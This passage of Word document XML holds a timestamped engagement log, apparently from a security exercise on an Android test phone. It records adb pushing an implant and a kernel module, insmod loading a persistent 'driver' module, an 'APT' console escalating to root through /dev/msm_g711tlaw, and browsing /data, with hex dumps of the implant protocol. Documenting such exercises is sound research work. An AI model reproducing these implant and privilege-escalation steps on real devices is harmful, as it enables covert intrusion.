    <w:p w14:paraId="789803AD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">sl                                                                                                                                                 100%   18KB  17.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD1FE21" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">sl.ko                                                                                                                                              100%   10KB   9.9KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F229C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AFA6CC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>16:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E97B5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb push sl* /data/local/tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082ECC0E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>sl: 1 file pushed. 0.5 MB/s (18048 bytes in 0.035s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656EBA3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>sl.ko: 1 file pushed. 5.0 MB/s (10120 bytes in 0.002s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A88AE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>2 files pushed. 0.6 MB/s (28168 bytes in 0.044s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A6B73" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51791EBA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C9A77" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>walleye:/ # cd /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE995A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>walleye:/data/local/tmp # ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EADEE89" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">sl sl.ko swap tc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A4B346" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767E2C10" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>16:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616D6563" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>walleye:/data/local/tmp # insmod sl.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD75F4E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>walleye:/data/local/tmp # ./sl SETUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D701319" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F995ECE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>walleye:/data/local/tmp # lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6CB91" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C8A986" w14:textId="320CCD9D" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">driver               </w:t>
      </w:r>
      <w:r w:rsidR="0097593C">
        <w:t xml:space="preserve">   4574  -735550601 [permanent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411190B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc12600095"/>
      <w:r>
        <w:t>Event Log (Cont)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="59E87565" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC8C24" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;elevate /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC922DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '+\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x001/dev/msm_g711tlaw\x00' (43 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B2D56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 2B 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  +... ...........</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501706CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 01 00 00 00 12 00 00 00 31 2F 64 65 76 2F 6D 73  ........1/dev/ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C8FB0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 6D 5F 67 37 31 31 74 6C 61 77 00                 m_g711tlaw.     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D102AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6028A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A042991" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB819C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606800A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE15B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C39114" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A17B51" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B049E1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 25 00 00 00 17 00 00 00 00 00 00 00 0D 00 00 00  %...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3236D2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 0D 00 00 00 00 00 00 00 75 69 64 3A 30 20 65 75  ........uid:0 eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206DD4EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 69 64 3A 30 00                                   id:0.           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E829B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: uid:0 euid:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66354D79" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E9FAA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C413DB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;cd /data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8A085" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x1e\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00/data\x00' (30 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062D367" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1E 00 00 00 12 00 00 00 00 00 00 00 06 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54DC06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 2F 64 61 74 61 00        ......../data.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489C892" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E03C37" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1972E625" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3DCF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170495F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;cd data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB74FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x1d\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00data\x00' (29 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183DF96" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1D 00 00 00 12 00 00 00 00 00 00 00 05 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B253085" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 05 00 00 00 00 00 00 00 64 61 74 61 00           ........data.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC32C8C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690A7B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767EDB70" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB54E39" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586C854" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC046CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41695CA0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x18\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02132F69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 18 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E74FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: 'i\x0b\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00Q\x0b\x00\x00Q\x0b\x00\x00\x00\x00\x00\x00net.mathsworkout\ncom.android.launcher3\ncom.fluxii.androidtv.mousetoggle\ncom.oper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAB6FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>a.mini.android\ncom.andro'...'rrh\n' (2921 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A4D9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: net.mathsworkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC07418" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.launcher3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B32CAC8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.fluxii.androidtv.mousetoggle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A437B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.opera.mini.android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271BA3F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.defcontainer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D41B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.aarno.clearscope.clearscopehttpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F22A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.pacprocessor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460852E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.sawicki.piotr.calculator.simple.simplecalculator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E217F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.bluetoothmidiservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD5768" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.camera2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF2F7C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.svox.pico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D87E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.musicfx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532A8CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.kk.browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382365D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.dacic.torche</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C2D42" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.socialnmobile.dictapps.notepad.color.note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210FB8B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.telephony</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ED0AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>android.ext.services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E833C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.requiem.gembuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416EBDF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.systemui.theme.dark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E63CC04" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.fluxii.android.sideloaderforfiretv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45966EA0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371EBA4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.dreams.basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE156F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E907A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.cellbroadcastreceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7AB0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.htmlviewer</w:t>
